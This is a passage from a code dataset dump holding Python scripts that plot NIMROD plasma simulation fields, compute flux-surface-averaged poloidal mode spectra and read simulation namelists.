ax.set_ylabel(r'$B0R$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(432)\n plt.title(r'$B0Z$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],B0Z[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$B0Z$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(433)\n plt.title(r'$B0T$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],B0T[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$B0T$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(434)\n plt.title(r'$V0T$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],V0T[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$V0T$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(435)\n plt.title(r'$P0$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],P0[files[0]][:,j],c=color[jj],label=r'$B_R$')\n \n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$P0$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(436)\n plt.title(r'$n0$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],n0[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$n0$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(437)\n plt.title(r'$J0R$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],J0R[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$J0R$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(438)\n plt.title(r'$J0Z$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],J0Z[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$J0Z$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(439)\n plt.title(r'$J0T$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],J0T[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$J0T$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n plt.tight_layout()\n filename=files[0].split('.')\n plt.savefig(filename[0]+\"_eq_findex.png\",bbox_inches='tight')\n\n\n fig=plt.figure(figsize=(12,12))\n #plt.subplots_adjust(left=0.10, bottom=0.12, right=0.95, top=0.92, wspace=0.175)\n ax=fig.add_subplot(431)\n plt.title(r'$B_R$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],BRr[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$B_R$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(432)\n plt.title(r'$B_Z$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],BZr[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$B_Z$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(433)\n plt.title(r'$B_\\phi$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],BTr[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$B_\\phi$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n\n\n ax=fig.add_subplot(434)\n plt.title(r'$V_R$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],VRr[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$V_R$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(435)\n plt.title(r'$V_Z$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],VZr[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$V_Z$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(436)\n plt.title(r'$V_\\phi$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],VTr[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n\n sm = cm.ScalarMappable(cmap=cm.rainbow, norm=plt.Normalize(vmin=min(slicesy), vmax=max(slicesy)))\n # fake up the array of the scalar mappable. Urgh...\n sm._A = []\n cx=plt.colorbar(sm)\n cx.set_ticks(slicesy)\n\n ax.set_ylabel(r'$V_\\phi$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(437)\n plt.title(r'$J_R$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],JRr[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$J_R$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(438)\n plt.title(r'$J_\\theta$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],JZr[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$J_\\theta$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(439)\n plt.title(r'$J_\\phi$ v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],JTr[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$J_\\phi$',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(4,3,10)\n plt.title(r'Real($P$) v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],Pr[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'Real($P$)',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(4,3,11)\n plt.title(r'Real($T_i$) v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],TIr[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'Real($T_i$)',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n\n ax=fig.add_subplot(4,3,12)\n plt.title(r'Real($n$) v. $R$',fontsize=12)\n plt.setp(ax.get_xticklabels(), fontsize=8)\n plt.setp(ax.get_yticklabels(), fontsize=8)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n jj=0\n for j in slicesy:\n ax.plot(R[files[0]][:,j],Nr[files[0]][:,j],c=color[jj],label=r'$B_R$')\n jj=jj+1\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'Real($n$)',fontsize=12)\n ax.set_xlabel(r'$r$',fontsize=12)\n plt.tight_layout()\n #plt.show()\n filename=files[0].split('.')\n if len(filename)==3:\n plt.savefig(filename[0]+'_findex.'+filename[1]+\".png\",bbox_inches='tight')\n else:\n plt.savefig(filename[0]+\"_findex.png\",bbox_inches='tight')\n\n plt.show()\n\n\n" }, { "alpha_fraction": 0.6005141139030457, "alphanum_fraction": 0.6258642077445984, "avg_line_length": 31.701448440551758, "blob_id": "658a0217794764743f422ffc3ce91ea4e3029a5e", "content_id": "eb02732d4779cb9f5ff6b130abb18da050c7317b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11282, "license_type": "no_license", "max_line_length": 90, "num_lines": 345, "path": "/surfmn/fsa_surfmn.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n#\n#profiles is a class for calculating 1D profiles\n# using the flux surface integration\n#\n#\nimport f90nml\nimport eval_comp_nimrod as ceval\n#from field_class import *\n#import comp_fsa as cfsa\nimport comp_fsa as cfsa\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\nfrom scipy.interpolate import interp1d,splev,UnivariateSpline\nimport os\nimport h5py\nimport sys\nimport numpy as np\nimport pickle\n\nclass fsasurfmn:\n def __init__(self,dumpfile,nimrodin):\n #start with dump file and nimrod.in info\n self.dumpfile=dumpfile\n self.nimrodin=nimrodin\n self.time=None\n self.step=None\n # next include info on how fsa's were performed\n self.mmax=None\n self.ifour=[]\n self.nfour=None\n self.setprofiles=False\n #finally end with the profiles\n self.psin=np.empty([1])\n self.psi=np.empty([1])\n self.rhon=np.empty([1])\n self.q=np.empty([1])\n self.qpsi=np.empty([1])\n self.vprime=np.empty([1])\n self.bmn=np.empty([1])\n self.bcmn=np.empty([1])\n self.bsmn=np.empty([1])\n def dump(self,file):\n pickle.dump(self.dumpfile,file)\n pickle.dump(self.nimrodin,file)\n pickle.dump(self.time,file)\n pickle.dump(self.step,file)\n # next include info on how fsa's were performed\n pickle.dump(self.mmax,file)\n pickle.dump(self.ifour,file)\n pickle.dump(self.nfour,file)\n pickle.dump(self.setprofiles,file)\n #finally end with the profiles\n if self.setprofiles==True:\n pickle.dump(self.psin,file)\n pickle.dump(self.psi,file)\n pickle.dump(self.rhon,file)\n pickle.dump(self.q,file)\n pickle.dump(self.vprime,file)\n pickle.dump(self.bmn,file)\n pickle.dump(self.bcmn,file)\n pickle.dump(self.bsmn,file)\n def load(self,file):\n self.dumpfile=pickle.load(file)\n self.nimrodin=pickle.load(file)\n self.time=pickle.load(file)\n self.step=pickle.load(file)\n # next include info on how fsa's were performed\n self.mmax=pickle.load(file)\n self.ifour=pickle.load(file)\n self.nfour=pickle.load(file)\n self.setprofiles=pickle.load(file)\n #finally end with the profiles\n if self.setprofiles==True:\n self.psin=pickle.load(file)\n self.psi=pickle.load(file)\n self.rhon=pickle.load(file)\n self.q=pickle.load(file)\n self.vprime=pickle.load(file)\n self.bmn=pickle.load(file)\n self.bcmn=pickle.load(file)\n self.bsmn=pickle.load(file)\n\n def get_m_index(self,m):\n '''Return the index for the given m\n Return None if m is out of range'''\n if self.mmax==None:\n write(\"mmax has not be set in get_m_index\")\n raise\n else:\n if m>self.mmax:\n return None\n elif m<-1*self.mmax:\n return None\n else:\n return m+self.mmax\n def dummy_fsa(self,rzc,y,dy,evalnimrod,flag,fargs):\n '''\n Dummy integrand for complex fsa, this is used to get v' and q\n without running a true fsa\n Flux surface averge quantities (f/bdgrth where y[2]=1/bdgrth)\n dy(0)=dl/deta or d eta/dl\n dy(1)=dr/deta or dr/dl\n dy(2)=1/bdgth :v'\n dy(3)=dq: q\n '''\n dy[4]=1.0\n return dy\n\n def surfmn_int(self,rzc,y,dy,evalnimrod,flag,fargs):\n '''\n Integrand for fluxsurface integration\n Flux surface averge quantities (f/bdgrth where y[2]=1/bdgrth)\n dy(0)=dl/deta or d eta/dl\n dy(1)=dr/deta or dr/dl\n dy(2)=1/bdgth\n dy(3)=dq\n dy(4)=dtheta\n '''\n\n #self.mmax=fargs.get(\"mmax\")\n\n\n b0=np.array(cfsa.get_b0(evalnimrod,rzc,flag))\n b = evalnimrod.eval_field('b', rzc, dmode=0)\n\n\n rr =rzc[0]\n q=self.qpsi(fargs.get('psi'))\n jac=rr*q/b0[2]\n dy[4]=dy[2]/jac #dtheta\n for ii, im in enumerate(self.ifour):\n oset = ii * (4*self.mmax+1)\n reb=np.real(b[:,im+1])\n imb=np.imag(b[:,im+1])\n rBePsi=rr*(reb[1]*b0[0]-reb[0]*b0[1])\n iBePsi=rr*(imb[1]*b0[0]-imb[0]*b0[1])\n for im in range(self.mmax):\n nmth=-(self.mmax-im)*y[4] #negative m theta\n pmth=(im+1)*y[4] #positive m theta\n dy[5+im+oset]=(rBePsi*np.cos(nmth)-iBePsi*np.sin(nmth))*dy[2]\n dy[6+self.mmax+im+oset]=(rBePsi*np.cos(pmth)-iBePsi*np.sin(pmth))*dy[2]\n dy[6+2*self.mmax+im+oset]=-(rBePsi*np.sin(nmth)+iBePsi*np.cos(nmth))*dy[2]\n dy[6+3*self.mmax+im+oset]=-(rBePsi*np.sin(pmth)+iBePsi*np.cos(pmth))*dy[2]\n dy[5+self.mmax+oset]=rBePsi*dy[2]\n return dy\n\n\n def get_rho_q(self,q):\n try:\n return interp1d(self.q,self.rhon, kind='cubic',fill_value=\"extrapolate\")(q)\n except:\n print(f\"The safety factor {q} is not it the domain\")\n raise\n\n def get_field_rho(self,field,rhon):\n try:\n return interp1d(self.rhon,field, kind='cubic')(rhon)\n except:\n print(f\"Problem evaluitng field at rhon={rhon}\")\n raise\n\n def calculate(self,rzo=None,rzx=None,nsurf=150,eqflag=0,fargs={},**kwargs):\n print(\"in calculate\")\n mi=kwargs.get(\"mi\",3.3435860e-27)\n qe=kwargs.get(\"qe\",1.609e-19)\n self.ifour=fargs.get(\"ifour\")\n self.mmax=fargs['mmax']\n self.nfour=len(fargs['ifour'])\n self.setprofiles=True\n\n #first call to fsa is to calcualte q\n print(\"before ceval\")\n cevalnimrod=ceval.EvalCompNimrod(self.dumpfile,fieldlist='nvptbj')\n print(\"after ceval\")\n dvar, yvar, contours = cfsa.FSA(cevalnimrod, rzo, self.dummy_fsa, 1, \\\n nsurf=nsurf,depvar='eta',dpow=0.5,rzx=rzx,flag=eqflag,normalize=True, \\\n fargs=fargs)\n\n\n iend=-1\n while np.isnan(yvar[:,iend]).any():\n iend -= 1\n iend += yvar.shape[1]+1\n #unevaluated interpoate\n self.qpsi=interp1d(dvar[2,:iend], dvar[7,:iend], kind='cubic')\n\n #second call to fsa is to calcualte b_ms ans psi_mn\n neq=1+self.nfour*(4*self.mmax+1)\n dvar,yvar,contours = cfsa.FSA(cevalnimrod, rzo, self.surfmn_int, neq, \\\n nsurf=nsurf,depvar='eta', dpow=0.5,rzx=rzx,flag=eqflag,normalize=False,\\\n fargs=fargs)\n\n iend=-1\n while np.isnan(yvar[:,iend]).any():\n iend -= 1\n iend += yvar.shape[1]+1\n\n bmn=np.zeros([self.nfour,2*self.mmax+1,iend])\n bcmn=np.zeros([self.nfour,2*self.mmax+1,iend])\n bsmn=np.zeros([self.nfour,2*self.mmax+1,iend])\n for ii in range(self.nfour):\n oset = ii * (4*self.mmax+1)\n bcmn[ii,:,:]= yvar[1+oset:2*self.mmax+2+oset,:iend]*(np.pi*2.0)\n bsmn[ii,0:self.mmax,:]=\\\n yvar[2+2*self.mmax+oset:2+3*self.mmax+oset,:iend]*(np.pi*2.0)\n bsmn[ii,self.mmax+1:2*self.mmax+1,:]=\\\n yvar[2+3*self.mmax+oset:2+4*self.mmax+oset,:iend]*(np.pi*2.0)\n bmn=np.sqrt(np.square(bcmn)+np.square(bsmn))\n rhomin=np.min(dvar[1,:iend])\n rhomax=np.max(dvar[1,:iend])\n self.rhon = np.linspace(rhomin,rhomax,200,endpoint=True)\n #dvars\n self.psin=interp1d(dvar[1,:iend], dvar[0,:iend], kind='cubic')(self.rhon)\n self.psi=interp1d(dvar[1,:iend], dvar[2,:iend], kind='cubic')(self.rhon)\n self.vprime=np.pi*2*interp1d(dvar[1,:iend], dvar[6,:iend], kind='cubic')(self.rhon)\n self.q=interp1d(dvar[1,:iend], dvar[7,:iend], kind='cubic')(self.rhon)\n\n self.bcmn=interp1d(dvar[1,:iend],bcmn, kind='cubic')(self.rhon)\n self.bsmn=interp1d(dvar[1,:iend],bsmn, kind='cubic')(self.rhon)\n self.bmn =interp1d(dvar[1,:iend],bmn , kind='cubic')(self.rhon)\n\n def get_resonance(self,field,nn,mm):\n ''' Evaluate the resonant component of a field at the given resonces'''\n if nn<1:\n print(\"nn must be positive by convention in get_resonance\")\n raise ValueError\n ndex=nn-1 #todo check\n mdex=self.get_m_index(mm)\n if ndex==None:\n print(f\"{nn} is not a n number in surfmn file\")\n raise ValueError\n if mdex==None:\n print(f\"{mm} is not an m number in surfmn file\")\n raise ValueError\n qres=mm/nn\n #if qres<self.qmin or qres>self.qmax:\n # print(qres,self.qmin,self.qmax)\n # print(f\"The q value {qres} is not resonant\")\n # raise ValueError\n resfield=interp1d(self.rhon,self.bmn[ndex,mdex,:])\n return resfield(self.get_rho_q(qres))\n\n def plot(self,pargs={}):\n for im,imode in enumerate(self.ifour):\n self.plot_radial(im,imode,pargs)\n self.plot_surfmn(im,imode,pargs)\n\n def plot_radial(self,ii,imode,pargs={}):\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n title=f\"$\\psi$(n={int(imode)}) at {self.time*1000:.3f}ms\"\n ylabel=f\"$\\psi_m$ [mWb]\"\n colorlist = list(mcolors.TABLEAU_COLORS)\n xlabel=r'$\\rho_N$'\n fontsize=18\n if imode==1:\n mlist=range(-4,1)\n elif imode==2:\n mlist=range(-6,-1)\n else:\n mstart=-2*imode\n mlist=range(mstart,mstart+imode+1)\n if 'mlists' in pargs:\n if ii<len(pargs['mlists'][ii]):\n mlist=pargs['mlists'][ii]\n rhomax=np.max(self.rhon)\n for im,this_m in enumerate(mlist):\n this_i = self.get_m_index(this_m)\n if this_i!= None:\n mlbl = \"m = \" + str(this_m)\n tc=colorlist[im%len(colorlist)]\n ax.plot(self.rhon/rhomax,self.bmn[ii,this_i,:]*1000, color=tc, label=mlbl)\n try:\n qlist=pargs['qlists'][ii]\n except:\n if imode==1:\n qlist=[-4,-3,-2]\n elif imode==2:\n qlist=[-4,-3,-2.5,-2,-1.5]\n elif imode==3:\n qlist=[-3,-2.33, -2,-1.67,-1.33]\n elif imode==4:\n qlist=[-3,-2,-1.75,-1.5,-1.25]\n elif imode==5:\n qlist=[-3,-2,-1.8,-1.6,-1.4,-1.2]\n else:\n qlist=[-4,-3,-2]\n\n for iq,qq in enumerate(qlist):\n try:\n irho = self.get_rho_q(qq)\n qlbl = f\"q = {qq:.2f}\"\n tc=colorlist[iq]\n ax.axvline(irho/rhomax,ls=':',color=tc, label=qlbl)\n except:\n print(f\"q={qq:.2f} is not in the domain\")\n ax.axhline(0,ls='-',c='k')\n ax.legend(loc=0,frameon=True,fontsize=fontsize)\n plt.title(title,fontsize=fontsize)\n plt.xlabel(xlabel,fontsize=fontsize)\n plt.ylabel(ylabel,fontsize=fontsize)\n plt.tight_layout()\n plt.show()\n\n def plot_surfmn(self,im,imode,surfmn,pargs={}):\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n # Set titles and labels\n title=f\"$\\psi$(n={int(imode)}) at {self.time*1000:.3f}ms\"\n # set contour levels, i could generalize this further if needed\n levels=301\n vmax=np.amax(self.bmn[im,:,:])*1000\n levels=np.linspace(0,vmax,301)\n cbar_ticks=np.linspace(0,vmax,11)\n # Update plot based on keys in kwargs\n xlabel=\"Poloidal Mode Number m\"\n fontsize=18\n # set up mrange()\n qmin=np.amin(self.q)\n qmax=np.amax(self.q)\n mrange=np.linspace(qmin,qmax)\n #create the surfmn plot\n plt.set_cmap('nipy_spectral')\n m=range(-self.mmax,self.mmax+1)\n mv, rv = np.meshgrid(m, self.rhon, sparse=False, indexing='ij')\n conf=plt.contourf(mv,rv,np.clip(self.bmn[im,:,:]*1000,0,None),levels=levels,vmax=vmax)\n plt.plot(imode*mrange,self.get_rho_q(mrange),c='w')\n plt.title(title,fontsize=fontsize)\n plt.ylabel(r'$\\rho_N$',fontsize=fontsize)\n plt.xlabel(xlabel,fontsize=fontsize)\n cbar=fig.colorbar(conf,ticks=cbar_ticks)\n plt.xlim(-self.mmax,self.mmax)\n plt.show()\n\n def get_dumptime(self):\n ''' Open the hdf5 dumpfile read the dump time and dumpstep\n '''\n with h5py.File(self.dumpfile, 'r') as h5file:\n try:\n self.time=h5file[\"dumpTime\"].attrs['vsTime']\n self.step=int(h5file[\"dumpTime\"].attrs['vsStep'])\n except:\n print(f\"Error reading time or step in {self.dumpfile}\")\n raise\n" }, { "alpha_fraction": 0.532439112663269, "alphanum_fraction": 0.5535719990730286, "avg_line_length": 39.16666793823242, "blob_id": "3d1eeeb198a2ac6cfbcd67f8c7b72434a1af5ebb", "content_id": "31d8eb212cb422e25fc5ac58e01e78ca2fdb157e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 31089, "license_type": "no_license", "max_line_length": 115, "num_lines": 774, "path": "/hocradic/hcFields.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport f90nml\nimport eval_nimrod as eval\nimport field_class as fc\nimport numpy as np\nfrom scipy.fft import fft, ifft, rfft\nimport plot_nimrod as pn\nimport matplotlib.pyplot as plt\nimport time\nimport nim_timer as timer\n\nclass hcfields:\n ''' hc fields is a class for reading/storing nimrod data on a mesh\n it also calculates the different terms in nimrods field advances\n this seperates the evaulation of these fields from fsa interation\n or plotting on various meshs\n '''\n\n def __init__(self,dumpfile,nimrodin):\n self.dumpfile=dumpfile\n self.nimrodin=nimrodin\n self.eval=None\n self.grid=None\n self.fielddict={}\n self.energyDict={}\n self.powerFluxDict={}\n self.advectDict={}\n self.filter=None\n self.evalb_timer=0.0\n self.fft_timer=0.0\n self.ndmode=0\n self.neq=False\n self.ne0=False\n self.npert=False\n self.pdmode=1\n self.peq=False\n self.p0=False\n self.ppert=False\n self.vdmode=0\n self.veq=False\n self.ve0=False\n self.vpert=False\n self.bdmode=0\n self.beq=False\n self.be0=False\n self.bpert=False\n self.jdmode=1\n self.jeq=False\n self.je0=False\n self.jpert=False\n self.diff_dmode=0\n\n if self.nimrodin is not None:\n self.nml=f90nml.read(self.nimrodin)\n self.grid_nml=self.nml.get('grid_input',{})\n self.equil_nml=self.nml.get('equil_input',{})\n self.const_nml=self.nml.get('const_input',{})\n self.physics_nml=self.nml.get('physics_input',{})\n self.closure_nml=self.nml.get('closure_input',{})\n self.solver_nml=self.nml.get('solver_input',{})\n self.output_nml=self.nml.get('output_input',{})\n self.set_physical_constants()\n self.set_evalnimrod()\n return None\n\n def set_physical_constants(self):\n '''\n Read namelists and set physical constants\n 